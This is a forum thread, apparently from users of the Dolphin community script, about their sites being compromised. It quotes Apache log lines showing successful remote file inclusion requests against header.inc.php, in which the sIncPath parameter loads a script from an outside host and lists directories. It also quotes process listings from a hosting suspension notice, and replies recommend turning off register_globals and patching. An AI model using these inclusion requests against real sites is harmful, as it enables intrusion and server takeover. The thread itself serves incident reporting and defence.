Security issue!!!!!!

[root@storm /home/*******/www/ray/modules]# user=*******;awk '{print $1,$7,$9}' /usr/local/apache/domlogs/$user/*|grep -iE "http|ftp|union|select|concat"|grep 200|grep -v member
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a see more 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2F&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
41.219.255.90 //ray/modules/global/inc/header.inc.php?sIncPath=http%3A%2F%2Fwww.vhstrungout.com%2Fposts.txt%3F&act=ls&d=%2Fhome%2F*******%2Fpublic_html%2Fray%2Fmodules%2Fim%2Fxml&sort=0a 200
[root@storm /home/*******/www/ray/modules]#



All successful hack attempts.

You always amaze me because you have spammed your hosting link all over expertzzz and here.. which I would guess is a reseller account. Then you post stuff like this to show everyone that you don't really know anything about hosting??

well he sells hosting with register_globals On and cant read the minimum requirements or even protect his own site. make you wonder huh?

Every think is fine on server end. I have had a security company investigate this and they say its an exploit in the script. My server is fully protected.

Also my site is hosted on a completely different server to my hosting.

And a member of staff has confirmed that the holes in the script are fixed.

I am having problem in my site same security problem.. can you fix this...
This is what i got in my email..

We have suspended your account due to an emergency situation we had with the box, it triggered our firewall, and due to the malicious scripts your website was running, we had to immediately suspend it to avoid any further downtime for other customers on the box.

This is all we could gather of what was running, we couldn't find from where in your script it was running, just it was launching see more malicious code that is affecting the server.

meromate 30130 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30131 0.0 0.0 0 0 ? ZN 17:20 0:00 [sh]
meromate 30150 15.7 0.0 5656 3736 ? SN 17:20 3:20 html
meromate 30167 37.2 0.0 5648 3752 ? SN 17:20 7:54 html

5756 meromate 19 4 7404 5720 1428 S 0 0.1 0:00.23 perl
5758 meromate 21 4 7196 5488 1428 S 0 0.1 0:00.22 perl
5767 meromate 21 4 7156 5424 1476 S 0 0.1 0:00.24 perl
7204 meromate 21 4 8192 6500 1480 S 0 0.2 0:00.13 perl
7206 meromate 21 4 7568 5816 1428 S 0 0.1 0:00.23 perl

can you fix this.. please write me

You should turn register globals off. This was already discussed. Also the dolphin 6.1.3 patch fixed some of these type of attacks.

Being new here I'm not privy to the members but the exploits shown in the 3 posts appear legit. Although, I have my register globals set to off. Some hosting companies such as hostgator (which is the #1 featured hosting company shown on this site) has register globals on but it can be changed in the cpanel via the Software/Services area > php.ini Quick Config.

If the globals are set to off and this is still taking place then there likely is a vulnerability somewhere in the script, although see more I'm not sure which version you're using. I'm testing the 6.1.5 and it seems stable but I've just started on it, so far, so good :-)